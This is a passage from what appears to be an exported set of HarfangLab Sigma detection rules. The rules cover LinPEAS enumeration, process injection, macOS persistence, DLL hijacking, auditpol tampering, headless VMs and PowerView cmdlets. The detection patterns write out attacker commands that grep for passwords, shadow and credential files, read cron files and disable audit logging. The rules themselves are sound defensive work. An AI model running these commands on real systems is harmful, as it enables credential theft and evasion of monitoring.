attack.t1592.002\n - attack.t1592.004\n - attack.privilege_escalation\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.LinPEAS\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemd:\n Image|endswith: '/find'\n CommandLine|contains: '/systemd -name *.service -o -name *.timer -o -name rocketchat.service -o -name *.socket'\n\n selection_sqlite3:\n Image|endswith: '/sqlite3'\n CommandLine|contains:\n - '/home/*/.cache/tracker/meta.db .schema nie:InformationElement_nie:copyright'\n - '/var/lib/postgresql/.cache/tracker/meta.db .schema maemo:PostalAddress'\n\n selection_psql:\n Image|endswith: '/timeout'\n CommandLine|contains: '1 psql -U pgsql -d template0 -c select version()'\n\n selection_bashrc:\n Image|endswith: 
'/grep'\n CommandLine|contains: '-Ei enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp'\n\n selection_dpkg_log:\n Image|endswith: '/grep'\n CommandLine|contains: '-R -i pwd\\|passw /var/log/dpkg.log'\n\n selection_connnected_services:\n Image|endswith: '/grep'\n CommandLine|contains: '-Ev .bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd'\n\n selection_nginx:\n Image|endswith: '/sed'\n CommandLine|contains: '-E s,ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so'\n\n selection_cron:\n Image|endswith: '/cat'\n CommandLine|contains: '/etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly /etc/crontab /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/*'\n\n selection_passwds:\n Image|endswith: '/find'\n CommandLine|contains: '/var/log/ /private/var/log -type f -exec grep -R -i pwd\\|passw {} ;'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fb64523-1865-4c78-bf2f-2e444dfd0947",
"rule_name": "LinPEAS Hacktool Enumeration Command Executed",
"rule_description": "Detects specific enumeration commands from the linPEAS shell script, a popular Open Source enumeration script for privilege escalation.\nAttackers may try to search for secrets or vulnerabilities present on an infected system to try and elevate their privileges locally or for lateral movement.\nIt is recommended to analyze the context behind the execution of the linPEAS tool as well as to look for malicious actions by the same user around this alert.\n",
"rule_creation_date": "2022-10-18",
"rule_modified_date": "2025-01-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1082",
"attack.t1592.001",
"attack.t1592.002",
"attack.t1592.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fddb898-f5d5-4dd5-b0b5-7385e614194e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079185Z",
"creation_date": "2026-03-23T11:45:34.079187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079191Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_possible_sacrifical_process.yml",
"content": "title: Possible Sacrificial Process Spawned\nid: 5fddb898-f5d5-4dd5-b0b5-7385e614194e\ndescription: |\n This rule detects suspicious parent/child process relationships that may indicate sacrificial processes or process injection.\n Malware such as Rhadamanthys Stealer or Cobalt Strike can inject its core component into a sacrificial process in order to evade defenses.\n It is recommended to analyze the execution context and the IP address contacted by this process, if there is any.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.discovery\n - attack.t1082\n - attack.credential_access\n - attack.t1539\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '?:\\Windows\\system32\\credwiz.exe'\n - '?:\\Windows\\system32\\OOBE-Maintenance.exe'\n - '?:\\Windows\\system32\\openwith.exe'\n - '?:\\Windows\\system32\\dllhost.exe'\n - '?:\\Windows\\system32\\rundll32.exe'\n ParentCommandLine:\n - '?:\\Windows\\system32\\dialer.exe'\n - '?:\\Windows\\system32\\openwith.exe'\n - '?:\\Windows\\system32\\dllhost.exe'\n - '?:\\Windows\\system32\\rundll32.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fddb898-f5d5-4dd5-b0b5-7385e614194e",
"rule_name": "Possible Sacrificial Process Spawned",
"rule_description": "This rule detects suspicious parent/child process relationships that may indicate sacrificial processes or process injection.\nMalware such as Rhadamanthys Stealer or Cobalt Strike can inject its core component into a sacrificial process in order to evade defenses.\nIt is recommended to analyze the execution context and the IP address contacted by this process, if there is any.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1082",
"attack.t1539",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ff36646-f412-456e-a97f-42ac3798d2c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296149Z",
"creation_date": "2026-03-23T11:45:35.296153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296160Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md",
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1543_004_launchctl_new_daemon.yml",
"content": "title: New Launch Daemon Added via Command-line\nid: 5ff36646-f412-456e-a97f-42ac3798d2c3\ndescription: |\n Detects a new Launch Daemon being added via command line (launchctl).\n Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\n Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\n An attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\n Note that the selection matches any launchctl bootstrap or load invocation spawned from the listed ancestor paths, so Launch Agents loaded the same way (gui domain) are reported as well.\n It is recommended to check the content of the newly loaded plist file for malicious content.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2024/06/26\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.001\n - attack.t1543.004\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/bin/launchctl'\n CommandLine|contains:\n - ' bootstrap'\n # Legacy way\n - ' load'\n Ancestors|contains:\n # folder\n - '/Volumes/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/Users/'\n - '/private/var/root'\n - '/usr/local/bin/'\n # binary\n - 'osascript'\n\n exclusion_sandbox:\n - Image|startswith: '/private/tmp/PKInstallSandbox'\n - ProcessParentImage|startswith: '/private/tmp/PKInstallSandbox'\n - ProcessAncestors|contains: '|/private/tmp/PKInstallSandbox.'\n\n exclusion_install:\n Ancestors|contains:\n - '/private/tmp/KSInstallAction'\n - '/usr/sbin/installer'\n\n exclusion_users_application:\n Ancestors|contains:\n - '/Users/*/Library/Application Support/'\n - '/Users/*/Applications/'\n\n exclusion_logioptions:\n - Image: '/Users/Shared/LogiOptionsPlus/depots/*/logioptionsplus/logioptionsplus_agent.app/Contents/Frameworks/logioptionsplus_updater.app/Contents/MacOS/logioptionsplus_updater'\n - ParentImage: '/Users/Shared/LogiOptionsPlus/depots/*/logioptionsplus/logioptionsplus_agent.app/Contents/Frameworks/logioptionsplus_updater.app/Contents/MacOS/logioptionsplus_updater'\n CommandLine:\n - '/bin/launchctl bootstrap gui/* /Library/LaunchAgents/com.logi.optionsplus.plist'\n - '/bin/launchctl load /Library/LaunchDaemons/com.logi.optionsplus.updater.plist'\n\n exclusion_grammarly:\n Ancestors|contains: '/Users/*/Applications/Grammarly Desktop.app/Contents/MacOS/Grammarly Desktop'\n\n exclusion_homebrew:\n Image|startswith: '/Users/*/homebrew/Library/Homebrew/'\n\n exclusion_lghub:\n ParentImage: '/Users/Shared/LGHUB/depots/*/core/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n CommandLine: '/bin/launchctl load /Library/LaunchDaemons/com.logi.ghub.updater.plist'\n\n exclusion_java_updater:\n ParentImage: '/Users/*/Library/Caches/com.oracle.java.JavaAppletPlugin/org.sparkle-project.Sparkle/*/Contents/MacOS/MacJREInstaller'\n CommandLine: 'launchctl load /Library/LaunchAgents/com.oracle.java.Java-Updater.plist'\n\n exclusion_bomgar:\n - Image: '/Users/*/.com.bomgar.scc.*/sdcust.cache/pin-launch/Open To Start Support Session.app/Contents/MacOS/bomgar-scc'\n - ParentImage: '/Users/*/.com.bomgar.scc.*/sdcust.cache/pin-launch/Open To Start Support Session.app/Contents/MacOS/sra-scc'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_manageengine:\n CommandLine: '/bin/launchctl load -wf /library/launchdaemons/com.manageengine.desktopcentral.dcagentupgrader.plist'\n\n exclusion_google:\n CommandLine:\n - '/bin/launchctl bootstrap system /library/launchdaemons/com.google.googleupdater.wake.system.plist'\n - '/bin/launchctl bootstrap gui/503 /Users/*/Library/LaunchAgents/com.google.GoogleUpdater.wake.plist'\n\n exclusion_adobe:\n CommandLine:\n - '/bin/launchctl load -wF /Library/Application Support/../LaunchAgents/com.adobe.AdobeDesktopService.plist'\n - '/bin/launchctl load -wF /Library/Application Support/../LaunchAgents/com.adobe.AdobeCreativeCloud.plist'\n ProcessAncestors|contains: '.app/Contents/MacOS/Install'\n\n exclusion_olfeo:\n ProcessParentImage: '/usr/local/bin/trustlane_authentication_agent'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ff36646-f412-456e-a97f-42ac3798d2c3",
"rule_name": "New Launch Daemon Added via Command-line",
"rule_description": "Detects a new Launch Daemon being added via command line (launchctl).\nLaunch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\nLaunch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\nAn attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\nNote that the selection matches any launchctl bootstrap or load invocation spawned from the listed ancestor paths, so Launch Agents loaded the same way (gui domain) are reported as well.\nIt is recommended to check the content of the newly loaded plist file for malicious content.\n",
"rule_creation_date": "2024-06-26",
"rule_modified_date": "2026-02-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004",
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "600f91f8-20f2-43d2-809e-26648abf6ff8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589691Z",
"creation_date": "2026-03-23T11:45:34.589702Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589716Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitlockerdeviceencryption.yml",
"content": "title: DLL Hijacking via BitLockerDeviceEncryption.exe\nid: 600f91f8-20f2-43d2-809e-26648abf6ff8\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerDeviceEncryption.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerDeviceEncryption.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsreg.dll'\n - '\\fveskybackup.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "600f91f8-20f2-43d2-809e-26648abf6ff8",
"rule_name": "DLL Hijacking via BitLockerDeviceEncryption.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BitLockerDeviceEncryption.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "601244c8-07d1-4169-b531-71204251c443",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623836Z",
"creation_date": "2026-03-23T11:45:34.623838Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623842Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings",
"https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpac/77878370-0712-47cd-997d-b07053429f6d",
"https://www.microsoft.com/en-us/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://strontic.github.io/xcyclopedia/library/auditpol.exe-A5452C41FBF27E4CDBE3E41893DDE72D.html",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_002_auditpol_tampering.yml",
"content": "title: Audit Policy Tampered via Auditpol\nid: 601244c8-07d1-4169-b531-71204251c443\ndescription: |\n Detects when a group or category of the audit policy is cleared or disabled.\n This technique is used by attackers to disable common telemetry sources, such as the Windows Event Log.\n The first two references of this alert point to Microsoft's documentation on the different audit (sub)categories.\n It is recommended to investigate which categories were disabled and what they affect to determine if the action is legitimate.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings\n - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpac/77878370-0712-47cd-997d-b07053429f6d\n - https://www.microsoft.com/en-us/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\n - https://strontic.github.io/xcyclopedia/library/auditpol.exe-A5452C41FBF27E4CDBE3E41893DDE72D.html\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2023/02/14\nmodified: 2026/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\auditpol.exe'\n - OriginalFileName: 'AUDITPOL.EXE'\n\n selection_current_dir:\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n cmd_set_disable:\n CommandLine|contains|all:\n - 'category:' # /category, /subcategory\n - ':disable' # /(success|failure):disable\n - '?set' # (-|/)set\n\n cmd_remove_users:\n CommandLine|contains|all:\n - ' ?remove'\n - 
' ?allusers'\n\n cmd_clear_logs:\n CommandLine|contains|all:\n - ' ?clear'\n - ' ?y'\n\n exclusion_ocs_inventory:\n Ancestors|contains:\n - '?:\\Program Files\\OCS Inventory Agent\\OcsService.exe'\n - '?:\\Program Files (x86)\\OCS Inventory Agent\\OcsService.exe'\n\n # https://www.microsoft.com/en-us/download/details.aspx?id=55319\n exclusion_security_compliance_toolkit:\n CurrentDirectory|endswith: '\\Windows 11 v24H2 Security Baseline\\Scripts\\'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n exclusion_provconnect:\n ProcessAncestors|contains: '?:\\Program Files\\proVconnect\\proVconnect Device Agent\\Device Agent\\bin\\proVconnect.Agent.Windows.exe'\n\n exclusion_lgpo:\n ProcessParentImage|endswith: '\\LGPO.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_avacee:\n CommandLine: '?:\\Windows\\SysWOW64\\auditpol.exe /set /subcategory:Logon /success:disable'\n Image: '?:\\Windows\\System32\\msiexec.exe'\n CurrentDirectory: '?:\\Program Files\\Avacee\\sip_agent\\'\n\n exclusion_cisco:\n ParentImage: '?:\\Program Files\\Cisco\\AMP\\\\*\\sfc.exe'\n\n condition: all of selection_* and 1 of cmd_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "601244c8-07d1-4169-b531-71204251c443",
"rule_name": "Audit Policy Tampered via Auditpol",
"rule_description": "Detects when a group or category of the audit policy is cleared or disabled.\nThis technique is used by attackers to disable common telemetry sources, such as the Windows Event Log.\nThe first two references of this alert point to Microsoft's documentation on the different audit (sub)categories.\nIt is recommended to investigate which categories were disabled and what they affect to determine if the action is legitimate.\n",
"rule_creation_date": "2023-02-14",
"rule_modified_date": "2026-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "60216eac-5738-459f-b61a-eadceb37d9fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611602Z",
"creation_date": "2026-03-23T11:45:34.611606Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611613Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_susp_virtualbox_headless_linux.yml",
"content": "title: VirtualBox Virtual Machine Started via VBoxHeadless (Linux)\nid: 60216eac-5738-459f-b61a-eadceb37d9fd\ndescription: |\n Detects the usage of the VBoxHeadless binary to start a virtual machine on Linux.\n Adversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\n It is recommended to investigate the process that spawned VBoxHeadless, and check the legitimacy of the started virtual machine.\nreferences:\n - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2024/08/28\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Virtualization\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/VBoxHeadless'\n\n filter_vbox:\n ParentImage|endswith: '/vboxsvc'\n\n filter_vagrant:\n Ancestors|contains: 'vagrant'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "60216eac-5738-459f-b61a-eadceb37d9fd",
"rule_name": "VirtualBox Virtual Machine Started via VBoxHeadless (Linux)",
"rule_description": "Detects the usage of the VBoxHeadless binary to start a virtual machine on Linux.\nAdversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\nIt is recommended to investigate the process that spawned VBoxHeadless, and check the legitimacy of the started virtual machine.\n",
"rule_creation_date": "2024-08-28",
"rule_modified_date": "2025-01-30",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "60c69b67-1825-42a8-bfa3-cfe816b7923a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595770Z",
"creation_date": "2026-03-23T11:45:34.595773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595781Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://powersploit.readthedocs.io/en/stable/Recon/README/",
"https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1",
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview",
"https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0194/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powerview.yml",
"content": "title: Malicious PowerShell PowerView Commandlets\nid: 60c69b67-1825-42a8-bfa3-cfe816b7923a\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the PowerSploit framework.\n PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\n These specific commandlets are part of the PowerView module of PowerSploit, which is a series of functions that perform network and Windows domain enumeration and exploitation.\n It is recommended to analyze actions taken by the PowerShell host process as well as to look for other suspicious activities on the host.\nreferences:\n - https://powersploit.readthedocs.io/en/stable/Recon/README/\n - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1\n - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview\n - https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0194/\ndate: 2022/07/21\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.s0194\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerSploit\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # enumerates 1000+ modifiable ACLs on a specified domain\n - 'Invoke-ACLScanner'\n\n # checks if the current user context has local administrator access to a specified host\n - 'Invoke-CheckLocalAdminAccess'\n # queries all saved RDP connection entries on 